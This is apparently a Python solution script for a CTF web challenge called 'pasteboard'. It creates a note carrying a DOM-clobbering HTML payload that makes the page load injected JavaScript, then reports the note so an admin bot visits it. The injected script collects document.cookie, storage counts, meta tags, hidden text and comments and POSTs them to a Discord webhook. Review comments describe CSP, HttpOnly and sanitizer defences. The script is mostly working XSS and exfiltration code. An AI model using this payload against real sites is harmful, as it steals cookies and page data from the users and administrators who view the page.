#!/usr/bin/env python3
"""
Comprehensive Flag Search - Check EVERY possible location
"""
import os
import time
from urllib.parse import urljoin

import requests

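# Base URL of the CTF challenge instance this script talks to.
CHALLENGE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"

# A Discord webhook URL is a bearer credential: the token in its path is all
# that is needed to post to the channel. Read it from the environment instead
# of committing it. A webhook URL that has already been committed or shared
# should be treated as leaked and deleted/regenerated in Discord.
DISCORD_WEBHOOK = os.environ.get("DISCORD_WEBHOOK", "")
if not DISCORD_WEBHOOK and __name__ == "__main__":
    # Fail before any request is sent rather than run with an empty receiver.
    raise SystemExit("Set the DISCORD_WEBHOOK environment variable before running")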

# Browser-side collection script, embedded further down in a data: URL.
#
# As written, the JavaScript fills a `results` object from the page it runs
# in and POSTs it as JSON to DISCORD_WEBHOOK. It looks at anything that might
# contain "uoftctf" or "flag":
#   1. window.FLAG / window.flag
#   2. names of window properties containing "flag"
#   3. whether any <script> text contains "uoftctf"
#   4. data-* attributes on <body> and <html>
#   5. name/content/property of every <meta> tag
#   6. count and text of hidden / display:none elements
#   7. HTML comments mentioning "uoftctf" or "flag"
#   8. after a 3000 ms delay: document.cookie and the combined
#      localStorage + sessionStorage entry count
# Two webhook posts are made: an immediate status message, and the delayed
# one carrying the results, truncated to 1900 characters.
#
# The trailing .replace('\n', ' ') flattens the whole script onto one line.
#
# NOTE(review), defensive reading: the cross-origin fetch() to the webhook is
# the exfiltration channel. A Content-Security-Policy with a restrictive
# connect-src would block that request, and cookies marked HttpOnly are not
# visible to document.cookie.
js_code = """
let results={};
let webhook='""" + DISCORD_WEBHOOK + """';

// 1. Check window properties
results.window_flag=window.FLAG||window.flag||null;

// 2. Check all global variables
let globals=Object.getOwnPropertyNames(window);
results.globals_with_flag=globals.filter(k=>k.toLowerCase().includes('flag'));

// 3. Check all script tags content
let scripts=Array.from(document.scripts).map(s=>s.textContent);
results.scripts_have_flag=scripts.some(s=>s.includes('uoftctf'));

// 4. Check data attributes
results.body_data=document.body.dataset;
results.html_data=document.documentElement.dataset;

// 5. Check meta tags
let metas=Array.from(document.querySelectorAll('meta')).map(m=>({
name:m.name,
content:m.content,
property:m.property
}));
results.metas=metas;

// 6. Check hidden elements
let hidden=Array.from(document.querySelectorAll('[hidden],[style*="display:none"],[style*="display: none"]'));
results.hidden_count=hidden.length;
results.hidden_text=hidden.map(h=>h.textContent).join(' ');

// 7. Check comments
let walker=document.createTreeWalker(document,NodeFilter.SHOW_COMMENT);
let comments=[];
let node;
while(node=walker.nextNode()){
if(node.nodeValue.includes('uoftctf')||node.nodeValue.includes('flag')){
comments.push(node.nodeValue);
}
}
results.comments=comments;

// 8. Check cookies after delay
setTimeout(()=>{
results.delayed_cookie=document.cookie;
results.delayed_storage_length=localStorage.length+sessionStorage.length;

fetch(webhook,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({content:'RESULTS: '+JSON.stringify(results,null,2).substring(0,1900)})
});
},3000);

// Also send immediate check
fetch(webhook,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({content:'Checking all locations...'})
});
""".replace('\n', ' ')

# HTML submitted as the note body. It declares two elements that carry ids:
#   - <form id="errorReporter"> with an <input name="path"> whose value is a
#     data:text/javascript URL carrying js_code
#   - <img id="renderConfig" src=x> whose onerror handler sets
#     window.lastRenderError and throws an Error
# NOTE(review): elements with an id are reachable as window.<id>, so this
# looks like DOM clobbering of globals that the challenge page's own script
# reads (errorReporter.path, renderConfig). That script is not shown here, so
# confirm against the application.
# Defensive reading: a sanitizer that lets id/name attributes through leaves
# named-property clobbering open. Stripping or namespacing those attributes
# (for example DOMPurify's SANITIZE_NAMED_PROPS) and never loading a script
# from a value read off a DOM-derived global closes it.
payload = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{js_code}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'

# Run banner: title and one-line description, framed by 80-column rules.
rule = "=" * 80
for banner_line in (
    rule,
    "COMPREHENSIVE FLAG SEARCH",
    rule,
    "Checking ALL possible flag locations",
    rule,
):
    print(banner_line)

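# Upper bound, in seconds, for each HTTP call. Without a timeout requests
# waits indefinitely on a stalled server.
REQUEST_TIMEOUT = 15

# Step 1: create the note. Redirects are not followed so that the Location
# header of the 302 (the path of the new note) can be read directly.
response = requests.post(
    urljoin(CHALLENGE_URL, "/note/new"),
    data={"title": "Full Search", "body": payload},
    allow_redirects=False,
    timeout=REQUEST_TIMEOUT,
)
note_path = response.headers.get("Location")

if response.status_code != 302:
    print(f"[-] Failed: {response.status_code}")
elif not note_path:
    # A 302 without Location gives nothing to report; say so instead of
    # submitting an empty URL to /report.
    print("[-] Failed: 302 response carried no Location header")
else:
    print(f"[+] Paste: {urljoin(CHALLENGE_URL, note_path)}")

    # Presumably gives the server a moment to store the note before it is
    # reported. TODO confirm this delay is needed.
    time.sleep(1)

    # Step 2: submit the note path to /report. The script treats 202 as
    # "queued"; what the server does with a queued report is not visible here.
    report_response = requests.post(
        urljoin(CHALLENGE_URL, "/report"),
        data={"url": note_path},
        timeout=REQUEST_TIMEOUT,
    )

    if report_response.status_code == 202:
        print("[+] Queued!")
        print("\nSearching:")
        for location in (
            "window.FLAG/flag properties",
            "All global variables with 'flag'",
            "Script tag contents",
            "Data attributes",
            "Meta tags",
            "Hidden elements",
            "HTML comments",
            "Delayed cookies/storage",
        ):
            print(f"  - {location}")
        print("\nCheck Discord in ~15 seconds!")
    else:
        print(f"[-] Failed: {report_response.status_code}")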
